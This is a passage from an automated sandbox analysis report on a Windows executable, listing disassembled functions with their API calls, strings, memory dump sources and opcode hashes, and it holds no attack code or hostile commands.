                                                                                      • Opcode ID: 913418c87a52fd6748226b1cd6335ccc16c6dea4d6ec4f3c912efcfe93c64d6d
                                                                                      • Instruction ID: f0245fbda7056a0cb7f8dd5763db568959e8da3e11cce931b261edb8a7aff0ea
                                                                                      • Opcode Fuzzy Hash: 913418c87a52fd6748226b1cd6335ccc16c6dea4d6ec4f3c912efcfe93c64d6d
                                                                                      • Instruction Fuzzy Hash: 77419E31248381AAD731DF28DC55BAEFBE8AF85700F08891DF5E8D31C1E6649A489773
                                                                                      Function 00D89A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadBitmapW.USER32(00000065), ref: 00D89A86
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D89AA7
                                                                                      • DeleteObject.GDI32(00000000), ref: 00D89ACF
                                                                                      • DeleteObject.GDI32(00000000), ref: 00D89AEE
                                                                                        • Part of subcall function 00D88BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00D89AC8,00000066), ref: 00D88BE1
                                                                                        • Part of subcall function 00D88BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00D89AC8,00000066), ref: 00D88BF9
                                                                                        • Part of subcall function 00D88BD0: LoadResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C0C
                                                                                        • Part of subcall function 00D88BD0: LockResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 142272564-0
                                                                                      • Opcode ID: c775fa4712db0e575c5fd6de54714a3b10b4ea20ff217d14cc8727d5bbadae5c
                                                                                      • Instruction ID: 26ea40155f50b7bf52aeccd96a87991a68daf77ae0dfa06c7969e506a0125b10
                                                                                      • Opcode Fuzzy Hash: c775fa4712db0e575c5fd6de54714a3b10b4ea20ff217d14cc8727d5bbadae5c
                                                                                      • Instruction Fuzzy Hash: 1A01F23264031537D71177789C42EBFB6AEEF86B61F4C0111B940E7291DE618C01A3B1
                                                                                      Function 00D91009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D91020
                                                                                        • Part of subcall function 00D91658: ___AdjustPointer.LIBCMT ref: 00D916A2
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00D91037
                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D91049
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00D9106D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2633735394-0
                                                                                      • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction ID: 89dcd15d0b38bf27c9a09276813b889bc97abbd3b467b116cc91b0fd860a22eb
                                                                                      • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction Fuzzy Hash: 4201E936400149FBCF226F55CC41EDA3BBAEF58754F154515FA5865120D332E8A2EBB0
                                                                                      Function 00D90B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D90B66
                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D90B6B
                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D90B70
                                                                                        • Part of subcall function 00D91C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D91C1F
                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D90B85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                      • String ID:
                                                                                      • API String ID: 1761009282-0
                                                                                      • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction ID: aad7fc89738d8d3cc9e19597470ff418d0dcb027d636a09008554d5ebfaedf05
                                                                                      • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction Fuzzy Hash: 93C0486C1842439C1F203EB076021AE4B908C62BDDB8451C9FC9A1B823AA16880A6036
                                                                                      Function 00D88CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D88BA5: GetDC.USER32(00000000), ref: 00D88BA9
                                                                                        • Part of subcall function 00D88BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D88BB4
                                                                                        • Part of subcall function 00D88BA5: ReleaseDC.USER32(00000000,00000000), ref: 00D88BBF
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00D88D24
                                                                                        • Part of subcall function 00D88EEA: GetDC.USER32(00000000), ref: 00D88EF3
                                                                                        • Part of subcall function 00D88EEA: GetObjectW.GDI32(?,00000018,?), ref: 00D88F22
                                                                                        • Part of subcall function 00D88EEA: ReleaseDC.USER32(00000000,?), ref: 00D88FB6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                      • String ID: (
                                                                                      • API String ID: 1061551593-3887548279
                                                                                      • Opcode ID: a0e01736feba7b80946e34e73b310ca3b09a86d1aab4a80e883c0bb497d0bf4f
                                                                                      • Instruction ID: d28bb49a76ce76db8e0c8165454c68c3a0b6abc98f90d49a77305a9f52722b8f
                                                                                      • Opcode Fuzzy Hash: a0e01736feba7b80946e34e73b310ca3b09a86d1aab4a80e883c0bb497d0bf4f
                                                                                      • Instruction Fuzzy Hash: B361F4B1204305AFD210EF64C888E6BBBE9FF89704F50495DF599C7260DB71E909DB62
                                                                                      Function 00D801DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _swprintf
                                                                                      • String ID: %ls$%s: %s
                                                                                      • API String ID: 589789837-2259941744
                                                                                      • Opcode ID: 956f9339b291e942d9e37c00713bdba0c98f94b794ea56bad526764c1c61fedd
                                                                                      • Instruction ID: c8641a3ec88de3db28e1c0a1bcb7e7e6d3188fac22c1a2fad77b6f9dab521fe5
                                                                                      • Opcode Fuzzy Hash: 956f9339b291e942d9e37c00713bdba0c98f94b794ea56bad526764c1c61fedd
                                                                                      • Instruction Fuzzy Hash: 8251863528C310FAEAE136948C4AF397E55EF45F00F60C50AB7DA644EAC5D1D85C673A
                                                                                      Function 00D77619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7761E
                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D77799
                                                                                        • Part of subcall function 00D7A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A0D7
                                                                                        • Part of subcall function 00D7A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A108
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$H_prologTime
                                                                                      • String ID: :
                                                                                      • API String ID: 1861295151-336475711
                                                                                      • Opcode ID: 9f51accf2e6c36a5ac3aed7f4371bc7c89ad168635f9254af3da8760cfaf1ac8
                                                                                      • Instruction ID: 70b925c9671ca2ba8c60c235799973cad0ebfedc925c9b8c045cbcba3d57fea5
                                                                                      • Opcode Fuzzy Hash: 9f51accf2e6c36a5ac3aed7f4371bc7c89ad168635f9254af3da8760cfaf1ac8
                                                                                      • Instruction Fuzzy Hash: 0241D371804258AADB34EB64DC55EEEB77CEF45300F4484AAB54DA2182FB709F85CB71
                                                                                      Function 00D7B275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: UNC$\\?\
                                                                                      • API String ID: 0-253988292
                                                                                      • Opcode ID: ad7c3d85ca4320714f2a79a1df3d386f5724b1b4c5f528b346b50d988b96a93f
                                                                                      • Instruction ID: 16e365e4d00620aee5f1c4c18ff0c983664bc4330f72fa03520e39df585da078
                                                                                      • Opcode Fuzzy Hash: ad7c3d85ca4320714f2a79a1df3d386f5724b1b4c5f528b346b50d988b96a93f
                                                                                      • Instruction Fuzzy Hash: B3414F35400259AACB21AF61DC41BEE7BA9EF053A0F54C567F95CA3142F770DA948AB0
                                                                                      Function 00D9C8E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00D9CD1F,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C98C
                                                                                      • GetLastError.KERNEL32(?,00D9CD1F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9C9B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: d0F
                                                                                      • API String ID: 442123175-1238022483
                                                                                      • Opcode ID: 0cb659e1cac2f5126330fdd50645cb453c0a93fa6c7885c454df37337c9e344c
                                                                                      • Instruction ID: 9c34c48e3f0757d292fa9f00eec56938e020b589dc55bb8a1f368b119633e654
                                                                                      • Opcode Fuzzy Hash: 0cb659e1cac2f5126330fdd50645cb453c0a93fa6c7885c454df37337c9e344c
                                                                                      • Instruction Fuzzy Hash: E7315E72A10219ABCB24CF5DCC80A9AB3F5FF48311F2485AAE54AD7350E730A981CF64
                                                                                      Function 00D9C803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00D9CD3F,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C89E
                                                                                      • GetLastError.KERNEL32(?,00D9CD3F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9C8C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: d0F
                                                                                      • API String ID: 442123175-1238022483
                                                                                      • Opcode ID: 685f7cda1de76945822f1b1775cbdeb802cf9463c06a5f068590e5fbfa291a31
                                                                                      • Instruction ID: 8d8620f8123f2a084b915e79cc81885f8cc044c63bdc2acc426da50fa0412ecf
                                                                                      • Opcode Fuzzy Hash: 685f7cda1de76945822f1b1775cbdeb802cf9463c06a5f068590e5fbfa291a31
                                                                                      • Instruction Fuzzy Hash: 15218D76A102199FCB15DF59C880BE9B7F9FB48301F1044AAE94AD7251D730AD85CB70
                                                                                      Function 00D8802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                      • API String ID: 0-874089819
                                                                                      • Opcode ID: 62ddb23c51ac22fadc0b13fb54610922590ed1d369e67cdbcf602489c2a6f0fd
                                                                                      • Instruction ID: 14217f1329a416c25c878afd9560d69409d92a9fbaf7a23606a483b31dc4c69c
                                                                                      • Opcode Fuzzy Hash: 62ddb23c51ac22fadc0b13fb54610922590ed1d369e67cdbcf602489c2a6f0fd
                                                                                      • Instruction Fuzzy Hash: FA218B75210706AFD304BB60C890E2AB768FF85750B948229F1058B682CF71EC44DBB0
                                                                                      Function 00D7DF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D7DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7DED4
                                                                                        • Part of subcall function 00D7DEB5: GetProcAddress.KERNEL32(00DB1E58,CryptUnprotectMemory), ref: 00D7DEE4
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000080,?,00D7DF2E), ref: 00D7DFB5
                                                                                      Strings
                                                                                      • CryptUnprotectMemory failed, xrefs: 00D7DFAD
                                                                                      • CryptProtectMemory failed, xrefs: 00D7DF75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                      • API String ID: 2190909847-396321323
                                                                                      • Opcode ID: 54396d862c3e0d442f2784d7d4b7213d9621e86b4c53daeec7816dd3ea144eee
                                                                                      • Instruction ID: ee860f178c19eea5a057ad1177ea6b79a5945b6ceb93863f380f444745412cd1
                                                                                      • Opcode Fuzzy Hash: 54396d862c3e0d442f2784d7d4b7213d9621e86b4c53daeec7816dd3ea144eee
                                                                                      • Instruction Fuzzy Hash: 56112B713092569BDB119B39CC11A6EB7ABEF85754B08C019F80ADA291FB60EC0082B0
                                                                                      Function 00D8D783 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D8DDAF
                                                                                      • ___raise_securityfailure.LIBCMT ref: 00D8DE96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: d0F
                                                                                      • API String ID: 3761405300-1238022483
                                                                                      • Opcode ID: 5c7c36a5c8fb28f059dbecaacc3f478c181b410ce2dccf9ffabe97407be73a15
                                                                                      • Instruction ID: ca474e4ebffe4ea5ebcbecf0813287d603fe9606dcb1b3695de2fc14f2bcb46c
                                                                                      • Opcode Fuzzy Hash: 5c7c36a5c8fb28f059dbecaacc3f478c181b410ce2dccf9ffabe97407be73a15
                                                                                      • Instruction Fuzzy Hash: 362112B550130B9ED704DF1DEE46F503BA4FB48318F11412AE909CBBA0E7B64980CF66
                                                                                      Function 00D712E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D7CED7: GetWindowRect.USER32(?,?), ref: 00D7CF0E
                                                                                        • Part of subcall function 00D7CED7: GetClientRect.USER32(?,?), ref: 00D7CF1A
                                                                                        • Part of subcall function 00D7CED7: GetWindowLongW.USER32(?,000000F0), ref: 00D7CFBB
                                                                                        • Part of subcall function 00D7CED7: GetWindowRect.USER32(?,?), ref: 00D7CFE8
                                                                                        • Part of subcall function 00D7CED7: GetWindowTextW.USER32(?,?,00000400), ref: 00D7D007
                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                      • SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
